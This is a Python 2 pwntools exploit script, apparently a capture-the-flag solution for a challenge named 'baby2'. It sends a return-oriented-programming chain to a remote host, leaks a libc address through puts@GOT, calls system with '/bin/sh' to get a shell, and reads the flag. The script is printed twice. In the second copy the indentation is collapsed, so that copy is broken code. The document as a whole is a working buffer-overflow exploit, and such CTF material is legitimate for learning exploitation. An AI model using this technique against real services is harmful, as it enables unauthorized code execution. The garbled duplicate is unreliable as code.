0xb0bb/baby2.py

## baby2.py
#!/usr/bin/env python2
from pwn import *
import sys

# context(terminal=['tmux', 'splitw', '-h'])  # horizontal split window
# context(terminal=['tmux', 'new-window'])    # open new window

def fail(msg):
    log.info("Exploit failed: {}".format(msg))
    exit(1)

def success(msg):
    log.success("{}".format(msg))
    exit(1337)

def main():

    INTRO = False
    HOST, PORT = sys.argv[1].split(':')

    try:

        for i in range(20):

            io = remote(HOST, PORT)

            banner = io.recvuntil(': ')[:-8]
            if INTRO == False:
                print banner
                INTRO = True

            rop  = cyclic(24)
            rop += p64(0x400783)  # pop rdi ; ret
            rop += p64(0x601fc8)  # puts@GOT
            rop += p64(0x400550)  # puts()
            rop += p64(0x400783)  # pop rdi ; ret
            rop += p64(0x602600)  # .data
            rop += p64(0x400580)  # gets()
            rop += p64(0x400608)  # pop rbp ; ret
            rop += p64(0x6025f8)  # .data
            rop += p64(0x400715)  # leave ; ret

            io.sendline(rop)

            leak = io.recvline().strip()
            leak = u64(leak+'\x00\x00')
            libc = leak - 0x809c0

            # log.info('leak: 0x%012x' % leak)
            # log.info('libc: 0x%012x' % libc)

            rop  = p64(0x400783)       # pop rdi ; ret
            rop += p64(libc+0x1b3e9a)  # /bin/sh
            rop += p64(libc+0x04f440)  # system()

            io.sendline(rop)

            io.sendline('cat flag')
            flag = io.recvline().strip()

            return flag
    except:
        io.close()

    return None

if __name__== '__main__':

    if len(sys.argv) < 2:
        fail('No target')

    flag = main()
    if flag.startswith("sctf{"):
        success(flag)

    fail("")
	#!/usr/bin/env python2
	from pwn import *
	import sys

	# context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
	# context(terminal=['tmux', 'new-window']) # open new window

	def fail(msg):
	log.info("Exploit failed: {}".format(msg))
	exit(1)

	def success(msg):
	log.success("{}".format(msg))
	exit(1337)

	def main():

	INTRO = False
	HOST, PORT = sys.argv[1].split(':')

	try:

	for i in range(20):

	io = remote(HOST, PORT)

	banner = io.recvuntil(': ')[:-8]
	if INTRO == False:
	print banner
	INTRO = True

	rop = cyclic(24)
	rop += p64(0x400783) # pop rdi ; ret
	rop += p64(0x601fc8) # puts@GOT
	rop += p64(0x400550) # puts()
	rop += p64(0x400783) # pop rdi ; ret
	rop += p64(0x602600) # .data
	rop += p64(0x400580) # gets()
	rop += p64(0x400608) # pop rbp ; ret
	rop += p64(0x6025f8) # .data
	rop += p64(0x400715) # leave ; ret

	io.sendline(rop)

	leak = io.recvline().strip()
	leak = u64(leak+'\x00\x00')
	libc = leak - 0x809c0

	# log.info('leak: 0x%012x' % leak)
	# log.info('libc: 0x%012x' % libc)

	rop = p64(0x400783) # pop rdi ; ret
	rop += p64(libc+0x1b3e9a) # /bin/sh
	rop += p64(libc+0x04f440) # system()

	io.sendline(rop)

	io.sendline('cat flag')
	flag = io.recvline().strip()

	return flag
	except:
	io.close()

	return None

	if __name__== '__main__':

	if len(sys.argv) < 2:
	fail('No target')

	flag = main()
	if flag.startswith("sctf{"):
	success(flag)

	fail("")